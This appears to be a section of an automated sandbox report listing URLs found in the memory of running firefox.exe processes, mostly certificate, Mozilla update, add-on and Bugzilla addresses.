Source: firefox.exe, 00000003.00000003.1571508369.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1568029139.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1541778340.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1562356175.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1566973694.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1547716853.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1552358255.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEC5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0N
Source: firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1539926673.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1522082697.000001CA0AE90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000003.00000003.1946711213.000001CA15B56000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ocsp.thawte.com0
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000003.00000003.1631784458.000001CA19C34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000003.00000003.1631784458.000001CA19C34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000003.00000003.1946711213.000001CA15B56000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: http://www.mozilla.com0
Source: firefox.exe, 00000003.00000003.1624172725.000001CA1984E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000003.00000003.2018426889.000001CA0B0D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2007548489.000001CA0BB95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1755320173.000001CA0BB86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1806707177.000001CA7FE0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1754304730.000001CA0BBC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2018426889.000001CA0B0A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000003.00000003.2007548489.000001CA0BB95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1755320173.000001CA0BB86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulC
Source: firefox.exe, 00000003.00000003.2043753666.000001CA7CF8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
Source: firefox.exe, 00000008.00000003.1468272975.00000271263FC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2666636998.00000271263FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.videolan.org/x264.html
Source: firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000003.00000003.1674522956.000001CA0EEC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000003.00000003.2017504175.000001CA0B167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1504434772.000001CA0C2E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1827373381.000001CA7FFCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000003.00000003.1504434772.000001CA0C2CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2093134412.000001CA0B5D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F12C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000003.00000003.1528174370.000001CA1B1CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2010169585.000001CA0B623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000003.00000003.1645389070.000001CA1B1DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000003.00000003.1826416115.000001CA0BEE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Win
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1533302246.000001CA1B10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1724971151.000001CA0C7BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1845629810.000001CA0BEE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1718320536.000001CA1B116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1826416115.000001CA0BEE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta
Source: firefox.exe, 00000003.00000003.1528006163.000001CA1B1EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000003.00000003.1517049972.000001CA0B3BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000003.00000003.1517801846.000001CA1B34E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000003.00000003.1517801846.000001CA1B346000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517801846.000001CA1B33A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B3AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000003.00000003.1517049972.000001CA0B3AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000003.00000003.1517049972.000001CA0B3BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517801846.000001CA1B34E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B3AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000003.00000003.1509442711.000001CA196B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000003.00000003.1517049972.000001CA0B3AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000003.00000003.1517801846.000001CA1B346000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B3AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000003.00000003.1517049972.000001CA0B3AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000003.00000003.1728229928.000001CA0C51D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1805468512.000001CA0C522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000003.00000003.1706743059.000001CA0EB74000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1808462601.000001CA0EB79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000003.00000003.2005131621.000001CA0C50F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1805580923.000001CA0C50F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1728439113.000001CA0C50F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1843308361.000001CA0C50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000003.00000003.1728349872.000001CA0C517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.2023659253.000001CA08592000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000003.00000003.1479322892.000001CA157AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532616474.000001CA1B149000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1646525536.000001CA1B14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1640490898.000001CA1B14E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1718008060.000001CA1B14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000003.00000003.1628297834.000001CA1B43E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000003.00000003.1478676467.000001CA15B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000003.00000003.1479322892.000001CA157AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1509442711.000001CA196E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/SelectOptionsLengthAssignmentW
Source: firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000003.00000003.1504434772.000001CA0C2E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1805793175.000001CA0C0E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1502221485.000001CA0EDD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000003.00000003.1502221485.000001CA0EDD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000003.00000003.1504434772.000001CA0C2CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/74f06853-c80d-4afc-9b2
Source: firefox.exe, 00000003.00000003.1504434772.000001CA0C2E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1805793175.000001CA0C0AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
